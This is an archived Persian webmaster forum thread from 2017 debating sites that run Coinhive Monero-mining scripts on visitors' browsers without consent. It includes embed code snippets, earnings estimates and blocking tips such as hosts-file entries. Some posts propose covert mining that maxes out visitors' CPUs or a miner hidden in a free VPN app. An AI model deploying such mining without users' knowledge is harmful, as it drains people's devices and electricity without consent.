PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : سو استفاده برخی از وب مسترها از استخراج بیت کویین

nevergotme
November 5th, 2017, 18:24
چند روز پیش به صورت تصادفی وارد سایت نقد فارسی (http://www.naghdefarsi.com/world-movies-review/18564-cars-3.html) شدم که گویا "بدون" اطلاع رسانی اسکریپت ماینینگ بیت کوین روی تمام نقدهای سایتشون قرار دادند و دارن از این کار سو استفاده میکنن ، این کار یه عمل غیر انسانی هستش که بدون اطلاع از پردازنده بازدید کننده سایتت برای منافع شخصی خودت استفاده کنی ! لطفا اگه سایتی می شناسید که بدون اطلاع رسانی دارن این کار رو میکنن معرفی کنید.

http://uupload.ir/files/l3fq_capture.png (http://uupload.ir/)

wapmaster
November 5th, 2017, 18:34
سلام دوست عزیز الان اکثرا دارن استفاده میکنن
برای من آنتی ویروس بهش گیر میده و اجازه ی اجرا رو نمیده

qaplan
November 5th, 2017, 19:04
تا چند ماه پیش هیچ کس نمیدونست ارز دیجیتالی چیه، ماین چیه، بیت کوین چیه الان همه دارن از هر چیزی برای ماین استفاده میکنند.
داخل اپ های ایرانی هم متاسفانه کدهای ماین مشاهده شده.

almandata
November 5th, 2017, 19:32
فکر نکنم سو استفاده باشه

از کاربرا بابت استفاده از محتوا پولی دریافت نمیشه

پس مدیریت سایت اختیار اینو داره پاپ اپ بذاره بنر بذاره جاوا بذاره

میتونید استفاده نکنید نه اینکه بگید سو استفاده کرده

کاربر پول سرور و هاست سایت رو میده که مدیر سایت به فکر درامد نباشه؟؟!

Reza G
November 5th, 2017, 20:08
فکر نکنم سو استفاده باشه
از کاربرا بابت استفاده از محتوا پولی دریافت نمیشه
پس مدیریت سایت اختیار اینو داره پاپ اپ بذاره بنر بذاره جاوا بذاره
میتونید استفاده نکنید نه اینکه بگید سو استفاده کرده
کاربر پول سرور و هاست سایت رو میده که مدیر سایت به فکر درامد نباشه؟؟!

از نظر فنی و اخلاقی شما بخوای کوکی های کاربر هم ذخیره کنی باید بهش اطلاع بدی و ازش اجازه بگیری
چه برسه به مواردی از این قبیل
دلیل نمیشه چون خدماتی رایگان هست، پدر مردم رو در بیاریم
کسی که فرد رو مجبور نکرده سرویس رایگان بده

AtrafNet
November 5th, 2017, 20:34
سلام
افزونه Adguard Adblocker رو تو فایرفاکس یا کروم نصب کنید می تونه براحتی ماینینگ هم علاوه بر بلاک تبلیغات شناسایی کنه.
همین الان این سایت هم باز کردم ازم پرسید که اجازه ماینینگ بهش میدم یا نه که براحتی یه دکمه بهش اجازه ندادم.

AfaghHost
November 6th, 2017, 12:23
استفاده از اطلاعات و منابع کاربر بدون اطلاع رسانی و کسب اجازه از وی به نوعی سوء استفاده محسوب میشه.

BazPardakht.Com
November 6th, 2017, 12:51
استفاده از اطلاعات و منابع کاربر بدون اطلاع رسانی و کسب اجازه از وی به نوعی سوء استفاده محسوب میشه.

البته فکر نمی کنم همیشه روی سیستم طرف بشینه
فکر کنم برای همون لحظه اجرا میشه و بعد از ترک از سایت کلا بسته میشه

wapmaster
November 6th, 2017, 13:03
البته فکر نمی کنم همیشه روی سیستم طرف بشینه
فکر کنم برای همون لحظه اجرا میشه و بعد از ترک از سایت کلا بسته میشه

بله تا زمانی که کاربر در سایت باشه ماین میکنه و بعد از خروج دیگه ماین نمیکنه

dertgtr
November 6th, 2017, 13:53
حالا چطوری این کار ماینینگ رو به این روش انجام میدن؟ اسکریپت خاصی روی سرور نصب میشه و .... ؟

ashadata
November 6th, 2017, 16:02
حالا چطوری این کار ماینینگ رو به این روش انجام میدن؟ اسکریپت خاصی روی سرور نصب میشه و .... ؟

https://coinhive.com/

- - - Updated - - -

این که بدون اطلاع سواستفاده کنه خیلی بد هست و کاربر حق شکایت داره

اما این سایت coinhive.com رو میشه ازش استفاده های بهتری کرد

مثلا برای یک سایت دانلودی

* اول لینک کارو غیر مستقیم کنیم ( بعنی کاربر مثل اپلود بوی وارد یک صفحه انتظار بشه )
* اعلانی به کاربر نشون داده بشه که اگر میخواد زمان انتظارش که مثلا یک دقیقه هست بشه 30 ثانیه باید دکمه استارت ماین رو بزنه

اینجوری هم اخلاقی هست هم به نفع کاربر و صاحب اون سایت

Balta
November 6th, 2017, 21:04
از یه سایت با 30 هزار آی پی روزانه که هر کاربر هم حدود 3 الی 4 دقیقه تو سایت می می مونه چقدر می شه از این طریق در آورد؟

BazPardakht.Com
November 6th, 2017, 21:38
دوستان این ماینینگ اصلا برای بیت کوین نیست
برای یه ارز دیجیالتیه دیگه است که ارزش هر کوین این ارزی برابر است با 93 دلار
ما روی یه سرور مجازی 2 کور cpu تست کردم و طی 6 ساعت حدود 0.002 سنت درآمد داشت که اصلا به صرفه نیست

hoka
November 6th, 2017, 22:08
از یه سایت با 30 هزار آی پی روزانه که هر کاربر هم حدود 3 الی 4 دقیقه تو سایت می می مونه چقدر می شه از این طریق در آورد؟

پاسخ بدن دوستان خوب هست

سیدرضا بازیار
November 6th, 2017, 22:25
من اتفاقا در این مورد یه مقاله دارم مینویسم که هفته آینده ارائه بدم...

به همین دلیل این کد رو در سایتم گذاشتم و دارم تست میکنم

در رابطه با اینکه تعداد بازدید اون سایت چقدره، تعداد بازدید ملاک نیست! قدرت کامپیوتر کاربر های سایت ملاکه

کد رو حدود ۱ ساعت پیش در سایتم گذاشتم و نتیجش این بود (هش بین ۴۰۰ تا ۱۵۰۰)
http://uupload.ir/files/0b62_screen_shot_1396-08-15_at_22.18.47.png (http://uupload.ir/)

این استخراج بیت کوین نیست! واحد مونرو هست. Monero (XRM)

https://www.cryptocompare.com/coins/xmr/overview/USD

در کل درآمدش خوب نیست. با تخمینی که من زدم شاید ماهیانه نهایتا ۳۰۰ تا ۴۰۰ هزار تومان بشه مونرو استخراج کرد

اما ناگفته نمونه که اگه مونرو هم مانند بیت کوین گران بشه ارزشش رو داره. اگه هدف شما از کسب مونرو این هست که بفروشید و به پول تبدیل کنید، ارزشش رو نداره. اما اگه میخواید نگهداری کنید واسه حداقل ۳ سال، شاید سود زیادی کنید

اگه مونرو هم مثل بیت کوین گران بشه ارزشش رو داره. چون دانشگاه MIT هم پشت این قضیه هست احساس میکنم پیشرفت خوبی داشته باشه...

T.Toosi
November 7th, 2017, 00:16
http://s6.uplod.ir/i/00903/4ofh7k8saj0k.png

شعار coinhive : کسب درآمد از بازدید کننده، بدون نشان دادن حتی یک بنر!

coinhive با بارگذاری lib های خودش سمت کاربر شروع cryptocurrency می کند و منابع شما هم خیلی کنترل شده مصرف می کند اما متاسفانه یک ابزار مناسب برای دولوپر های malware شده است که خیلی راحت با یکم دستکاری و پیدا کردن payday از این سایت می شود سوء استفاده کرد و حتی منابع کاربر را 100% مصرف کرد.

http://s6.uplod.ir/i/00903/x9eyzvzc0858.png

Ashkankamangar.ir
November 7th, 2017, 00:40
http://s6.uplod.ir/i/00903/4ofh7k8saj0k.png

شعار coinhive : کسب درآمد از بازدید کننده، بدون نشان دادن حتی یک بنر!

coinhive با بارگذاری lib های خودش سمت کاربر شروع cryptocurrency می کند و منابع شما هم خیلی کنترل شده مصرف می کند اما متاسفانه یک ابزار مناسب برای دولوپر های malware شده است که خیلی راحت با یکم دستکاری و پیدا کردن payday از این سایت می شود سوء استفاده کرد و حتی منابع کاربر را 100% مصرف کرد.

http://s6.uplod.ir/i/00903/x9eyzvzc0858.png

حالا این مصرف سی پی یو چه سودی برای این سایت داره که بابتش هزینه میده؟

و دوم اینکه یه تجربه بهم میگه اگر بخواد یه نفر بدون اجازه کاربر این کارو بکنه قطعا گوگل با وبسایت مورد نظر برخورد میکنه

M.D.A
November 7th, 2017, 03:16
حالا این مصرف سی پی یو چه سودی برای این سایت داره که بابتش هزینه میده؟

و دوم اینکه یه تجربه بهم میگه اگر بخواد یه نفر بدون اجازه کاربر این کارو بکنه قطعا گوگل با وبسایت مورد نظر برخورد میکنه

پردازش انجام میده برای ماین کردن و استراخ اون واحد ارزی دیجیتال،مثل بیت کوین.
در واقع سیستم کاربر میشه سرور پردازشگر تولید پول

.K.H.A.
November 7th, 2017, 11:05
هستن سایتهای پاپ آپی که دارن با استفاده از سایت coinhive رو کلی سایت و کاربر برنامشونو پیش میبرن! بدون اینکه کسی بدونه داستان چیه به جای پاپ آپ یه فایل باز و بسته میشه واسه کاربر اما عملا تا یه مدت زمان خاص داره رو سیستم اجرا میشه ....

dertgtr
November 7th, 2017, 12:09
کدهای مورد نیاز رو از
coinhive چطور استخراج و تو سایتمون بزاریم؟ :دی

mehrania
November 7th, 2017, 14:33
دوستان عزیز میشه راهنمایی کنید که اگ از این سایت استفاده بشه موتور های جستجو مثل گوگل برخورد میکنه یا خیر ؟

ashadata
November 7th, 2017, 14:47
چقدر همه علاقه مند شدن که بذارن :)

البته اگر بیشتر بررسی کنیم میبینیم اگه منابع زیادی رو درگیر نکنه و مدت کمی هم وقت بگیره بنظرم بد نیست !

dertgtr
November 7th, 2017, 15:18
چقدر همه علاقه مند شدن که بذارن :)

البته اگر بیشتر بررسی کنیم میبینیم اگه منابع زیادی رو درگیر نکنه و مدت کمی هم وقت بگیره بنظرم بد نیست !

قضیه تاپیک کلا چیز دیگه ای بود :71:

حالا کدها رو چطور تو سایت مون بزاریم؟

saeid1346
November 7th, 2017, 15:26
داداش اومدی اطلاع رسانی کنی ولی بد اموزی داشت ظاهرا =))

dertgtr
November 7th, 2017, 15:34
داداش اومدی اطلاع رسانی کنی ولی بد اموزی داشت ظاهرا =))

دقیقا :71:

gdfire
November 7th, 2017, 18:45
چجوری تو سایتا قرار بدیم؟8-}

shivahost
November 7th, 2017, 22:45
اصلا از اینکار ها نکنید.

اول اینکه مخصوصا روی موبایل ها‌سایت شما بسیار اذیت خواهد کرد و موبایل بازدید کننده داغ می کند و باطری به شدت مصرف می کند و موبایل هم بسیار کند می شود و لگ میزند‌

دوم‌اینکه ارزش ندارد! با توجه به قیمت فعلی حدود ۹۹ دلار این ارز باید ۱ میلیون هش برای 0.01 دلار انجام‌شود که به مرور زمان بدتر هم میشود. یعنی در یک شبانه روز حتی به زور شاید یک‌دلار در بیاورید.

اگر بازی دارید یا فیسبوک برای شماست یا تلگرام‌ مال شماست بصورت کنترل شده با یک‌هسته بزارید این اسکریپ‌ همراه با اپلیکیشن‌ شما کار کند

Ringmoon
November 7th, 2017, 22:59
اصلا از اینکار ها نکنید.

اول اینکه مخصوصا روی موبایل ها‌سایت شما بسیار اذیت خواهد کرد و موبایل بازدید کننده داغ می کند و باطری به شدت مصرف می کند و موبایل هم بسیار کند می شود و لگ میزند‌

دوم‌اینکه ارزش ندارد! با توجه به قیمت فعلی حدود ۹۹ دلار این ارز باید ۱ میلیون هش برای 0.01 دلار انجام‌شود که به مرور زمان بدتر هم میشود. یعنی در یک شبانه روز حتی به زور شاید یک‌دلار در بیاورید.

اگر بازی دارید یا فیسبوک برای شماست یا تلگرام‌ مال شماست بصورت کنترل شده با یک‌هسته بزارید این اسکریپ‌ همراه با اپلیکیشن‌ شما کار کند

برای بیت کوین همچین چیزی هست ؟

shivahost
November 7th, 2017, 23:30
برای بیت کوین همچین چیزی هست ؟

خیر

بیت کوین دیگه اصلا ماینینگ با cpu نمیشه و این اسکریپت ها که از
cpu استفاده می کنند فقط بدرد این ارز می خورند.

dertgtr
November 8th, 2017, 02:10
اصلا از اینکار ها نکنید.

روی سیستم خودمون چطور استفاده کنیم؟ خروجی درآمد رو از این سایت چطور استخراج کنیم؟

Ashkankamangar.ir
November 8th, 2017, 02:33
روی سیستم خودمون چطور استفاده کنیم؟ خروجی درآمد رو از این سایت چطور استخراج کنیم؟

کاملا مشخصه دیگه برای اجرای زیر Miner یه لینک هست میزنین و استارت میکنین
در مورد استخراج هم میرید setting
بخش payment کاملا مشخصه
اول میرید سایت https://mymonero.com/ ثبت نام میکنید که اونم یه کم بخونید مشخصه چه طوریه
بعد این سایت یه کد پابلیک بهتون میده اون کد پابلیک رو در قسمت پایمنت میزنید و مشخص میکنید اتوماتیک وقتی به چقدر رسید منتقل کنه و خودش منتقل میکنه به کیف پولی که ساختید

BazPardakht.Com
November 8th, 2017, 02:59
من یه تست حدود 35 ساعته انجام روی سروری که 2 کور سی پی یو و 4 گیگ رم داشت انجام دادم
و کلی این 35 ساعت به عنوان 1 کاربر به صورت مدام در حال ماینینگ بود که کلا تونست 0.012 سنت در بیاره
تازه ببینید من به صورت مدارم صفحه رو باز گذاشته بودم و عملا هیچ کدوم از کابران سایت شما به مدت 35 ساعت نمی مونن
و با اجرا کردن این کد روی سایتتون حتی اگر بتونید روزی 1 دلار هم در بیارید ضرر بزرگی کردید که و فقط وقتتون تلف شده
و از همه بدتر مصرف برقی که برای مردم داره به کنار و یا شخصی که خودش می خواد به تنهایی این کار رو انجام بده به هیچ عنوان پیشنهاد نمیشه چون مصرف برق فوق العاده بالایی داره و چیزی جز ضرر برای شخص نداره
کلا این نوع ماینینگ به هیچ عنوان به درد نمی خوره

ColdWorld
November 8th, 2017, 03:06
دوستان عزیز این کار فقط واسه سایتهای فوق العاده غول که بازدید 100 میلیون دارن در روز مثل PirateBay درامد زاست نه سایتهای کوچیک و حتی متوسط!

Ashkankamangar.ir
November 8th, 2017, 03:08
من یه تست حدود 35 ساعته انجام روی سروری که 2 کور سی پی یو و 4 گیگ رم داشت انجام دادم
و کلی این 35 ساعت به عنوان 1 کاربر به صورت مدام در حال ماینینگ بود که کلا تونست 1 سنت در بیاره
تازه ببینید من به صورت مدارم صفحه رو باز گذاشته بودم و عملا هیچ کدوم از کابران سایت شما به مدت 35 ساعت نمی مونن
و با اجرا کردن این کرد روی سایتتون حتی اگر بتونید روزی 1 دلار هم در بیارید ضرر بزرگی کردید که و فقط وقتتون تلف شده
و از همه بدتر مصرف برقی که برای مردم داره به کنار و یا شخصی که خودش می خواد به تنهایی این کار رو انجام بده به هیچ عنوان پیشنهاد نمیشه چون مصرف برق فوق العاده بالایی داره و چیزی جز ضرر برای شخص نداره
کلا این نوع ماینینگ به هیچ عنوان به درد نمی خوره

من روی 3 لپ تاپ 4 هسته باز گذاشتم کلا 8 ساعت و حدود 0.00039 XMR درآمد داشت درسته خوب نیست حالا مصرف برق به کنار میتونه سی پی یو رو تعطیل کنه و عمر لب تاب رو میاره پایین نهایت اینجوری شما روزی 0,0016 xmr درآمد دارید یعنی ماهی 0.48 xmr که میشه 48.78 دلار حالا 3 عدد سی پی یو قیمتش چقدره؟:66:
پس تنها راه اینه در سایت باشه و از سی پی یو کاربر استفاده کنه ولی جوری کد نویسی بشه که از هر کاربر یک هسته 100 درصد بگیره

BazPardakht.Com
November 8th, 2017, 03:12
من روی 3 لب تاب 4 هسته باز گذاشتم کلا 8 ساعت و حدود 0.00039 XMR درآمد داشت درسته خوب نیست حالا مصرف برق به کنار میتونه سی پی یو رو تعطیل کنه و عمر لب تاب رو میاره پایین نهایت اینجوری شما روزی 0,0016 xmr درآمد دارید یعنی ماهی 0.48 xmr که میشه 48.78 دلار حالا 3 عدد سی پی یو قیمتش چقدره؟:66:
پس تنها راه اینه در سایت باشه و از سی پی یو کاربر استفاده کنه ولی جوری کد نویسی بشه که از هر کاربر یک هسته 100 درصد بگیره

من عدد درآمد رو تصحیح کردم

0.012 سنت در 35 ساعت

در مورد 100% سی پی یو هم عرض به خدمتتون برسونم که متاسفانه خیلی از افراد هستن که با اجرا شدن اون سایت کل سیستمشون خاموش میشه
نمونش خودم روی یه لپ تاپم اجرا کردم که CORE i5 هست و به 30 ثانیه هم نمیکشید و 3 بار به این شکل خودکار خاموش شد
این باعث ضرر خوردن خیلی از کاربرا میشه که یواش یواش مردم متوجه این ماجرا میشن و دیگه به اون سایت سر نمی زنن

Ashkankamangar.ir
November 8th, 2017, 03:18
من عدد درآمد رو تصحیح کردم

0.012 سنت در 35 ساعت

در مورد 100% سی پی یو هم عرض به خدمتتون برسونم که متاسفانه خیلی از افراد هستن که با اجرا شدن اون سایت کل سیستمشون خاموش میشه
نمونش خودم روی یه لپ تاپم اجرا کردم که CORE i5 هست و به 30 ثانیه هم نمیکشید و 3 بار به این شکل خودکار خاموش شد
این باعث ضرر خوردن خیلی از کاربرا میشه که یواش یواش مردم متوجه این ماجرا میشن و دیگه به اون سایت سر نمی زنن

باید روی سرور لینوکسی از طریق اس اس اش اجرا کنیم با مثلا 70 درصد سی پی یو اینجوری یه سرور 24 هسته سی پی یو میتونه ماهی تا 2 xmr سود بده یعنی 160 یورو اگه به قول دوستمون پس انداز کنی تا مثلا مثل بیت کوین هر یک xmr بشه 500 یورو بعد سود میشه 1000 یورو
الان سود نداره همه هم فکر الان نیستن دارن پس انداز میکنن

1eng.ir
November 8th, 2017, 03:28
چرا بذارید تو سایتتون؟ :68:

یه کم کثیف‌تر کار کنید/کنیم!! و یه اپلیکیشن وی‌پی‌ان رایگان بنویسید/بنویسم!
بذارید/بذاریم موبایلای ملت درگیرش بشه و اووووف :->

https://motherboard.vice.com/en_us/article/3kvdv9/samsung-upcycling-galaxy-s5-bitcoin-mining-rig
راه‌های رسیدن به خدا بسیار است!

صریحاً در همینجا اعلام میکنم اگه از این کارای چیپ انجام شد کار من نیست!!

نکنید از این کاراهاااا
ترجیحاً سعی کنیم رستگار شویم I-)

شب بخیر

bigcowboy
November 8th, 2017, 13:22
چرا بذارید تو سایتتون؟ :68:

یه کم کثیف‌تر کار کنید/کنیم!! و یه اپلیکیشن وی‌پی‌ان رایگان بنویسید/بنویسم!
بذارید/بذاریم موبایلای ملت درگیرش بشه و اووووف :->

https://motherboard.vice.com/en_us/article/3kvdv9/samsung-upcycling-galaxy-s5-bitcoin-mining-rig
راه‌های رسیدن به خدا بسیار است!

صریحاً در همینجا اعلام میکنم اگه از این کارای چیپ انجام شد کار من نیست!!

نکنید از این کاراهاااا
ترجیحاً سعی کنیم رستگار شویم I-)

شب بخیر

روی اندروید های 4 میشه هر کاری کرد
ولی روی 5 و مخصوصا 6 و 7 و 8 سخت گیریا خیلی خیلی بیشتر شده و این چیزا خیلی کنترل میشه
البته همیشه یه راهی هست ولی نمی ارزه ، به نظرم
ولی ایدت خوب بود

Ashkankamangar.ir
November 9th, 2017, 12:01
اصلا از اینکار ها نکنید.

// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
if (!miner.isMobile() && !miner.didOptOut(14400)) {
miner.start();
}
برای موبایل

T.Toosi
November 9th, 2017, 13:26
باسلام، mining کردن آنقدر که فکر می کنید آسان نیست! اگر آسان بود همه سیستم ها را روشن می گذاشتند و پولدار می شدند، تمامی مرورگر های شما جاوا اسکریپت را پشتیبانی می کنند، جاوا اسکریپت هم رابط OpenGL را پشتیبانی می کنند، OpenGL برای پردازش به threads های GPU دسترسی دارد که برای ساخت هش بسیار سریع است، thread های پیش فرض Coinhive دو عدد (خیلی کم) است که قابل افزایش است، اگر حداکثر را استفاده کنید باید قادر به ساخت 20 هش در دقیقه باشید، همانطور که یکی از دوستان اشاره کرد سایت های پر ترافیک مثل piratebay یا سایت های پر ترافیک پو_رن هاب، تیوب 8 و .. الان در حال استفاده هستند که فرض کنیم روزی یک میلیون بازدید کننده پو_رن هاب (خیلی بیشتر از این ارقام است) برای یک دقیقه در سایت باشند 20 میلیون هش ساخته خواهد شد. lib های جاوا اسکریپت برای استخراج بیت کوین هم نوشته شده است که با جستجوی پیدا خواهید کرد.

shivahost
November 9th, 2017, 16:03
برای موبایل

با این کد داره میگه روی موبایل ها اجرا نشه! با توجه به اینکه بسیاری بازدید کننده ها امروزه موبایل شده اند پس دیگه استفاده از این کد اصلا و ابدا به صرفه نیست!

Ashkankamangar.ir
November 9th, 2017, 17:16
با این کد داره میگه روی موبایل ها اجرا نشه! با توجه به اینکه بسیاری بازدید کننده ها امروزه موبایل شده اند پس دیگه استفاده از این کد اصلا و ابدا به صرفه نیست!
با تغییراتی میشه کاری کرد که اصلا داخل موبایل اجرا نشه یا حتی داخل موبایل استفاده رو محدود کنه
به هر حال چه بخوایم چه نخوایم الان 50 درصد سایتهای ایرانی دارند این سیستم رو روی سایت
قدیم پاپ آپ بود الانم این
من بلاکر نصب کردم برای این مورد سایتی نشده باز کنم و بلاک نکنه
37077

ولی در کل شما صحیح میفرمایید

shivahost
November 9th, 2017, 18:57
با تغییراتی میشه کاری کرد که اصلا داخل موبایل اجرا نشه یا حتی داخل موبایل استفاده رو محدود کنه
به هر حال چه بخوایم چه نخوایم الان 50 درصد سایتهای ایرانی دارند این سیستم رو روی سایت
قدیم پاپ آپ بود الانم این
من بلاکر نصب کردم برای این مورد سایتی نشده باز کنم و بلاک نکنه
37077

ولی در کل شما صحیح میفرمایید

انشالله بزودی گوگل برخورد کنه باهاشون.

dellserver
November 9th, 2017, 20:50
دوستان من این دو کد رو میگذارم سایتم اما کار نمیکنه ممنون میشم کمک کنید بجای یور کی هم کی سایت که ایجاد کردم میگذارم -کار دیگه باید بکنم ؟
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');
miner.start();
</script>

shivahost
November 9th, 2017, 20:55
شما site key خودت را باید بگیرید و جایگزین کنید.

Ashkankamangar.ir
November 9th, 2017, 21:39
از وقتی این تاپیک زده شد و دوستان ازین سرویس استفاده کردند
ارزش این واحد پولی حدود 40 دلار بیشتر شد/:)

dellserver
November 9th, 2017, 21:46
جناب شیوا هاست والا من کی سایت رو جای گزین کردم کار نمیکنه

shivahost
November 9th, 2017, 21:51
جناب شیوا هاست والا من کی سایت رو جای گزین کردم کار نمیکنه

چیز خاصی ندارد. فقط اسکریپتی که شما لود کردید فکر کنم نیاز به تایید بازدید کننده دارد. باید اسکریپت زیر رو بجاش لود کنید که در سایت خودشان هم گفتند.

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

من تست کاملی کردم روی این مورد و روی سایتی فعال گذاشتم و اصلا به صرفه نیست و حتی چون باعث مصرف منابع می شود مردم را از سایت فراری می دهد.

dellserver
November 9th, 2017, 22:08
ببخشید من هر کاری میکنم کار نمیکنه شما میتونید یه تست کنید کد من رو ببینید کار میکنه یا نه

<script>
var miner = new CoinHive.Anonymous('ndXdrYWGkOTUziH6Kq6QR6gcyUHA7i nk

');
miner.start();
</script>

gdfire
November 9th, 2017, 23:04
:)):)):)):))بهتر مهم درامده بهتر از این پاپ اپه و کلیکیا د ز د ه بعدشم دلار 4 برابره پول ایرانه کاملا عاقلانه تره که همه بیان سمتش :-p
تو ایران یکی همچین سرویسی بزنه همه وبمسترا میرن سمتش هیف که نیست کی اوقت حاضره کدا پاپ اپ و باکس و بنرو کوفت زهرمار بزاره....

Ashkankamangar.ir
November 9th, 2017, 23:04
ببخشید من هر کاری میکنم کار نمیکنه شما میتونید یه تست کنید کد من رو ببینید کار میکنه یا نه

<script>
var miner = new CoinHive.Anonymous('ndXdrYWGkOTUziH6Kq6QR6gcyUHA7i nk

');
miner.start();
</script>

اینو بذارید بعد نیم ساعت بعد داخل پنل رو ببینید

<script>
var miner = new CoinHive.Anonymous('ndXdrYWGkOTUziH6Kq6QR6gcyUHA7i nk');
miner.start();
</script>

Ashkankamangar.ir
November 10th, 2017, 01:51
دوستان یه کم مراعات کنن بهتره ها
بعد از یک وبگردی کوتاه در سایتهای ایرانی
37081

Raymvnd
November 10th, 2017, 01:56
درود...این که الان شده ۱۱۶ دلار..واقعا ارزشش داره بالا میره...

Ashkankamangar.ir
November 10th, 2017, 02:05
درود...این که الان شده ۱۱۶ دلار..واقعا ارزشش داره بالا میره...

بله توی یک هفته
37082

November 5th, 2017, 06:54 PM تاریخ این تاپیک بود از روز 6 تغییرو ببینید

AtrafNet
November 10th, 2017, 09:40
دوستان یه کم مراعات کنن بهتره ها
بعد از یک وبگردی کوتاه در سایتهای ایرانی
37081

جناب جسارته ها درسته این افزونه جلوی ماینینگ سایت ها رو میگیره ولی این چون کارکرد اصلیش بلاک تبلیغات بنری هستش این عدد blocked که می نویسه در اکثر مواقع تعداد بنر های تبلیغاتی مسدود شده هست وگرنه الان تو همین انجمن هم 5 مورد رو بلاک شده گزارش میده.
البته می دونم حتماً از این موضوع اطلاع داشتید ولی با توجه به پست قبلیتون که گفتید اکثر سایت های ایرانی ماینینگ میکنن خدایی از حق نگذریم به جز تعداد معدود انگشت شمار دیگه سایر سایت های ایرانی حداقل هنوز وارد ماینینگ نشدن.

راستی با توجه به اینکه شما تو عکس افزونه Kaspersky Protection رو تو فایرفاکس نصب دارید اصولاً باید آنتی ویروس سیستم شما هم کسپرسکی باشه مگه نه؟ من که از اون قضیه استفاده هکر های روسی از موقعیت کسپرسکی برای شنود از آمریکایی ها و دستور آمریکا به حذف کسپرسکی در تمامی ارگان ها و اداراتش (منبع: https://www.google.com/search?q=آمریکا+کسپرسکی&ie=utf-8&oe=utf-8) دیگه اعتماد قبل رو به کسپرسکی ندارم و با اینکه هنوز 6 ماه از لایسنسم مونده پاکش کردم خواستم بدونم برای شما یعنی آنتی ویروسی با این همه ادعا ماینینگ رو مسدود نمیکنه که نیاز به افزونه جدا نداشته باشید؟؟ چون تو صفحه اول تاپیک کاربر wapmaster گفتن که آنتی ویروسی که دارن براشون ماینینگ رو مسدود میکنه.

ashadata
November 10th, 2017, 10:40
ببینید این وب سایت خدمات دیگه هم داره ها !

کپچا داره که مقدار مشخصی ماین میکنه ؛ برای لاگین سایت ها میشه استفاده کرد !

MJmoonwalk
November 10th, 2017, 10:48
لب تاب اشتباست. لپ تاپ...

قرار نیست این سایت ها سیاستشون اینقدر بچه گانه باشه که به سرعت بشه ازش درامد کسب کرد اون هم با قرار دادن روی سرورهای مجازی و سایت هایی که 100 تا بازدید کننده داره که از اون صدتا هم 90 تاش صاحب سایته باقیش هم بی هدف!
این روش نیاز به فعالیت زیاد و کسب درامد در دراز مدت داره. منع قانونی هم برای استفاده از اون نیست فقط AdBlock میتونه این روش رو روی مرورگر از کار بندازه که بازهم روش های دور زدن هست و مدیر سایت میتونه اجبار کنه غیرفعال کردن AdBlock رو.

هرچی باشه از روش های کسب درامد یکطرفه سیستم های تبلیغاتی چرت حال حاضر بهتر هست. تبلیغ دهنده پولش رو از متقاضی میگیره و به شما میگه برای هزاران نفر نمایش بده هرکی کلیک کرد یچیزی هم تو جیب تو میره حالا بشین یکی کلیک کنه ولی تبلیغ دیده میشه واسه خودش. یا تبلیغات پاپ آپ که روی اعصاب آدم میره.

اگر وب سایت شما بازدیدی نداره دنبال این روش نباشید. اما اگر بازدید مناسبی دارید بجای خوردن منابع کاربر از روش Catptcha یا روش درخواست کلیک از سوی کاربر استفاده کنید.

ahmad4u
November 10th, 2017, 12:11
برای جلوگیری از سوءاستفاده چنین ابزارهایی دو راه اصلی توصیه می شود.
اول استفاده از نرم افزارها یا افزونه های معتبری که مانع از نمایش تبلیغات می شوند (ad-blocker).
دوم ویرایش دستی فایل hosts ویندوز در مسیر windows\system32\drivers\etc به کمک نرم افزار Notepad و افزودن آدرس های coin-hive.com و coinhive.com به فهرست سایت های بلاک شده.

saeed1988m
November 10th, 2017, 12:33
این که نیاز به تایید و استارت کاربر داره دوستان
یا روش دیگه ای که بنده نمیدونم
برای سایتی با نزدیک 20 هزار آی پی به نظرتون به صرفه هست استفاده کنیم حدود 1تا2دقیقه هم کاربرا میمونن معمولا

Ashkankamangar.ir
November 10th, 2017, 14:13
جناب جسارته ها درسته این افزونه جلوی ماینینگ سایت ها رو میگیره ولی این چون کارکرد اصلیش بلاک تبلیغات بنری هستش این عدد blocked که می نویسه در اکثر مواقع تعداد بنر های تبلیغاتی مسدود شده هست وگرنه الان تو همین انجمن هم 5 مورد رو بلاک شده گزارش میده.
البته می دونم حتماً از این موضوع اطلاع داشتید ولی با توجه به پست قبلیتون که گفتید اکثر سایت های ایرانی ماینینگ میکنن خدایی از حق نگذریم به جز تعداد معدود انگشت شمار دیگه سایر سایت های ایرانی حداقل هنوز وارد ماینینگ نشدن.

راستی با توجه به اینکه شما تو عکس افزونه Kaspersky Protection رو تو فایرفاکس نصب دارید اصولاً باید آنتی ویروس سیستم شما هم کسپرسکی باشه مگه نه؟ من که از اون قضیه استفاده هکر های روسی از موقعیت کسپرسکی برای شنود از آمریکایی ها و دستور آمریکا به حذف کسپرسکی در تمامی ارگان ها و اداراتش (منبع: https://www.google.com/search?q=آمریکا+کسپرسکی&ie=utf-8&oe=utf-8) دیگه اعتماد قبل رو به کسپرسکی ندارم و با اینکه هنوز 6 ماه از لایسنسم مونده پاکش کردم خواستم بدونم برای شما یعنی آنتی ویروسی با این همه ادعا ماینینگ رو مسدود نمیکنه که نیاز به افزونه جدا نداشته باشید؟؟ چون تو صفحه اول تاپیک کاربر wapmaster گفتن که آنتی ویروسی که دارن براشون ماینینگ رو مسدود میکنه.

در مورد اول بله ولی این افزونه علاوه بر نوشتن بلاک یه کاربرد دیگم داره و اینکه دقیقا ارور میده که کاربر مصرف سی پی یو رو میخواد اجازه میدی؟

د مورد کسپر من فکر کنم ده سالی هست کسپر دارم و واقعا از امنیتی که ایجاد کرده راضی هستم جوری که سمت هیچ آنتی ویروسی نمیرم و واقعا کاربردی تر از کسپر ندیدم
در مورد جلوگیری هم شایدگزینه ای داشته باشه چون من کانفیگش نکردم ولی در حالت عادی نه جلوشو نمیگیره ولی سایتی اگر ویروسی باشه یا حتی حمله رو میگیره بارها شده گفته از فلان آیپی میخواد وارد لپ تاپت بشه
یا مثلا سایتی رو باز کردم گفته فلان فایل جاواش آلودست

saeed1988m
November 10th, 2017, 16:48
من اتفاقا در این مورد یه مقاله دارم مینویسم که هفته آینده ارائه بدم...

به همین دلیل این کد رو در سایتم گذاشتم و دارم تست میکنم

